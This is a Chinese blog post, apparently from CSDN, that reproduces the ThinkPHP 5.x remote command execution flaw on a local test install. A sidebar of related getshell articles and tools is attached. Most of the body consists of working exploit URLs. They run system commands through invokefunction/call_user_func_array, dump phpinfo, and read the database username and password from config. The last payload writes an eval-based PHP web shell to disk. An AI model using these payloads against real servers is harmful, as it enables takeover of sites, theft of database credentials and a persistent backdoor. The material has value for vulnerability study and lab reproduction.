php 远程执行sh,ThinkPHP 5.* 远程命令执行漏洞复现与GETSHELL

最新推荐文章于 2023-06-23 15:49:52 发布
最新推荐文章于 2023-06-23 15:49:52 发布
阅读量232 收藏
点赞数
文章标签: php 远程执行sh

Thinkphp 下载地址:

http://www.thinkphp.cn/donate/download/id/1125.html     ThinkPHP5.0.15完整版

本地环境搭建phpstudy ,在WWW根目录建立文件夹放入代码

9b8eff1e3785?utm_campaign=haruki

如果想要开启 debug 报错 在目录建立 文件

9b8eff1e3785?utm_campaign=haruki

里面的内容写:     APP_DEBUG = true

成功开启debug报错

9b8eff1e3785?utm_campaign=haruki

漏洞复现:

漏洞exp:  index.php?a=system&b=id&_method=filter

9b8eff1e3785?utm_campaign=haruki

http://127.0.0.1/thinkphp5015/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

网页直接返回 whoami

9b8eff1e3785?utm_campaign=haruki

3、通过phpinfo函数写出phpinfo()的信息:

http://127.0.0.1/thinkphp5015/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

9b8eff1e3785?utm_campaign=haruki

获取数据库用户名和密码,把username 改成 password  获得数据库的密码

http://127.0.0.1/thinkphp5015/public//?s=.|think\config/get&name=database.username

9b8eff1e3785?utm_campaign=haruki

写入shell

/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][]=<?php @eval($_POST['code']);?>

9b8eff1e3785?utm_campaign=haruki

9b8eff1e3785?utm_campaign=haruki

发现厨房
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现
千寻的博客
12-19 5336
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备漏洞发现漏洞复现(数据包)漏洞复现工具)修复建议摘抄免责声明 漏洞名称 ThinkPHP 5.0.23 远程代码执行漏洞 漏洞编号 CVE-2018-20062 漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名, 导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在
2024年最新ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,2024年最新我把所有网络安全框架整理成了PDF
最新发布
2301_79985178的博客
05-06 1152
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。docker ps**漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
ThinkPHP v5.x命令执行利用工具(可getshell
thinkphp v5.0.11漏洞_ThinkPHP 5.x 远程代码getshell漏洞实战分析
weixin_39700394的博客
12-21 251
ThinkPHP 简介ThinkPHP 是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,因为其易用性、扩展性,已经成长为国内颇具影响力的WEB应用开发框架漏洞解析漏洞引发的原因是框架对控制器名没有进行足够的检测,现拉取ThinkPHP v5.0.22 来进行测试请求路由=>http://127.0.0.1/public/index.php?s=/index/\think\ap...
THINKPHP5 getshell
公众号shadow sock7
12-11 7877
参考: https://mp.weixin.qq.com/s/oWzDIIjJS2cwjb4rzOM4DQ https://www.anquanke.com/post/id/167653 http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23及v5.1.31以下版本)_远程命令执行漏洞利用(getshell)/ ...
漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)
weixin_34314962的博客
12-11 4111
0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run the project 然后访问给出的target address执行系统命令显示目录下文件http://aaa.vsplate.me:52763/public/index.php?s=/index...
thinkphp5调用shell脚本_【漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)
weixin_39906358的博客
01-16 318
0x00复现环境0x01步骤0x02漏洞原理分析关键代码在修复之前程序未对控制器进行过滤,导致攻 击 者可以通过引入 \ 符号来调用任意类方法。$this -> app -> controller 方法来实例化控制器,然后调用实例中的方法。follow the controller method:thinkphp/library/think/App.php通过parseModuleAn...
ThinkPHP5 5.0.23 远程代码执行漏洞复现-分析
zeroc009的博客
02-15 1849
漏洞简述 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 关键代码 @@ -522,8 +522,11 @@ public function method($method = false) return $this->server('REQUEST_METHOD') ?: 'GET'; } elseif (!
一、WillPHPv2代码审计-[变量覆盖]-[文件包含]-[任意文件读取漏洞]-[pearcmd裸文件包含]
qwsn
12-12 3400
时间戳——2021.12.12 0x01 WP: 第一步:拉去本地代码审计(框架调试) 第二步:调试过程 第三步:在buuctf开启的的环境里获取flag 附:怎么配置phpstorm+phpstudy+xdebug远程调试 注意:配置一个假的远程调试,我们就把源码放到本机(也就是127.0.0.1)的网站根目录WWW下的exp/willphpv2目录下 第一步:访问https://xdebug.org/wizard,把phpinfo的内容贴进去,会返回我们可以使用的对应版本的xdebug 第二
ThinkPHP_getshell-v2.zip
11-11
验证think PHP5版本漏洞并可以getshell
thinkphp5.X-Batch-getshell-master.rar
03-31
thinkphp5各版本通用poc
thinkphp网站测试工具
04-26
单元测试能做,首先依赖于编写的代码,写的随意的代码,是很难做单测的,所以,第一项工作就是要编写可以测试的代码,所以开发的时候就要考虑怎么测试,如果能遵循测试驱动开发,敲码前先写单测,那更好; 第二项工作,就是单测的编写了。往往打桩是比较麻烦的,但是越大的系统,依赖的外部组件和系统越多,不打桩根本无法测试。目前phpunit有支持打桩。 第三,如果是旧项目,代码写的随意,缺少封装,过程式的,甚至是面包屑代码,如何测试?我能想到的,要么重构代码,要么就得做大量的打桩工作;即使如此,也不能保证真的就能对这些代码进行单测。
ThinkPHP5.0版本 远程命令执行漏洞GetShell
09-02 290
https://blog.csdn.net/Fly_hps/article/details/84954664 漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控...
Thinkphp 5.1.41 getshell
qq_41619801的博客
06-23 2018
首先需要实现反序列化,找到传参数的位置。影响thinkphp 5.1.37——5.1.41测试可以自己实现一个函数为了实现反序列化自动执行的魔法函数,要找到一个析构函数,thinkphp\library\think\process\pipes\Windows.php中有一个继续跟进removeFiles()file_exists会将$filename当作字符串进行处理,触发任意类的__toString()这时候需要找到一个__toString函数能继续向下执行的类,全局搜索。
ThinkPHP5远程代码执行exp利用工具safe6
safe6
12-12 7039
影响范围:ThinkPHP 5.0 - 5.1版本。 危害:远程代码执行 目前,ThinkPHP已发布新版本修复此漏洞,请广大ThinkPHP站长尽快升级: https://blog.thinkphp.cn/869075   2018.12.11 说明: 漏洞检测,5.0和5.1都可以检测。 命令执行,文件上传只支持5.0版本tp。5.1和5.0利用大同小异,不打算写。这只是个练手...
php 远程 执行,THINKPHP5 远程命令执行
weixin_30420175的博客
03-10 308
漏洞背景前台有回显RCE框架介绍:ThinkPHP是一款运用极广的PHP开发框架。漏洞引入:1.其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。2.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞特征网站指...
菜刀(代码执行)函数和命令执行函数详解及Getshell方法
dfdhxb995397的博客
06-11 899
i春秋作家:大家奥斯的哦 原文来自:https://bbs.ichunqiu.com/thread-41471-1-1.html 代码执行函数 VS 命令执行函数 一直想整理这两块的内容,但是一直没时间弄,直到前两天碰上一个写入了菜刀马但是死活连不上菜刀的站,顿时不知道怎么继续了,所以就趁这个机会整理了一下代码执行函数怎么getshell命令执行函数怎么ge...
php提权教程,thinkphp 5.x版本代码执行可直接提权getshell
weixin_39647412的博客
03-10 1513
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。影响范围5.x < 5.1.31, <= 5.0.23漏洞分析Thinkphp v5.0.x补丁地址: htt...
ThinkPHP5.0.* Request类远程代码执行漏洞分析
"这篇文档主要讨论的是ThinkPHP框架中的一个安全漏洞,具体是关于request函数的远程代码执行问题,涉及到的文件是library/think/Request.php的541至603行。此问题影响ThinkPHP 5.0.*版本。攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值